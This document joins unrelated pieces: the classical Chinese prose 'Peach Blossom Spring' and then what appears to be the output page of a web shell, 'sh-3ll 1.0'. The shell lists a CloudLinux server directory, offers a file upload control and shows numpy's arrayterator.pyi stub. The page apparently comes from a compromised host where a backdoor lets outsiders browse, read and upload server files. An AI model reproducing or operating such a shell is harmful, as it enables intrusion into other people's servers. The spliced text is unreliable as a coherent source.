晋太元中,武陵人捕鱼为业。缘溪行,忘路之远近。忽逢桃花林,夹岸数百步,中无杂树,芳草鲜美,落英缤纷。渔人甚异之,复前行,欲穷其林。   林尽水源,便得一山,山有小口,仿佛若有光。便舍船,从口入。初极狭,才通人。复行数十步,豁然开朗。土地平旷,屋舍俨然,有良田、美池、桑竹之属。阡陌交通,鸡犬相闻。其中往来种作,男女衣着,悉如外人。黄发垂髫,并怡然自乐。   见渔人,乃大惊,问所从来。具答之。便要还家,设酒杀鸡作食。村中闻有此人,咸来问讯。自云先世避秦时乱,率妻子邑人来此绝境,不复出焉,遂与外人间隔。问今是何世,乃不知有汉,无论魏晋。此人一一为具言所闻,皆叹惋。余人各复延至其家,皆出酒食。停数日,辞去。此中人语云:“不足为外人道也。”(间隔 一作:隔绝)   既出,得其船,便扶向路,处处志之。及郡下,诣太守,说如此。太守即遣人随其往,寻向所志,遂迷,不复得路。   南阳刘子骥,高尚士也,闻之,欣然规往。未果,寻病终。后遂无问津者。 sh-3ll

HOME


sh-3ll 1.0
DIR:/opt/cloudlinux/venv/lib64/python3.11/site-packages/numpy/lib/
Upload File :
Current File : //opt/cloudlinux/venv/lib64/python3.11/site-packages/numpy/lib/arrayterator.pyi
from collections.abc import Generator
from typing import (
    Any,
    TypeVar,
    Union,
    overload,
)

from numpy import ndarray, dtype, generic
from numpy._typing import DTypeLike

# TODO: Set a shape bound once we've got proper shape support
_Shape = TypeVar("_Shape", bound=Any)
_DType = TypeVar("_DType", bound=dtype[Any])
_ScalarType = TypeVar("_ScalarType", bound=generic)

_Index = Union[
    Union[ellipsis, int, slice],
    tuple[Union[ellipsis, int, slice], ...],
]

__all__: list[str]

# NOTE: In reality `Arrayterator` does not actually inherit from `ndarray`,
# but its ``__getattr__` method does wrap around the former and thus has
# access to all its methods

class Arrayterator(ndarray[_Shape, _DType]):
    var: ndarray[_Shape, _DType]  # type: ignore[assignment]
    buf_size: None | int
    start: list[int]
    stop: list[int]
    step: list[int]

    @property  # type: ignore[misc]
    def shape(self) -> tuple[int, ...]: ...
    @property
    def flat(  # type: ignore[override]
        self: ndarray[Any, dtype[_ScalarType]]
    ) -> Generator[_ScalarType, None, None]: ...
    def __init__(
        self, var: ndarray[_Shape, _DType], buf_size: None | int = ...
    ) -> None: ...
    @overload
    def __array__(self, dtype: None = ...) -> ndarray[Any, _DType]: ...
    @overload
    def __array__(self, dtype: DTypeLike) -> ndarray[Any, dtype[Any]]: ...
    def __getitem__(self, index: _Index) -> Arrayterator[Any, _DType]: ...
    def __iter__(self) -> Generator[ndarray[Any, _DType], None, None]: ...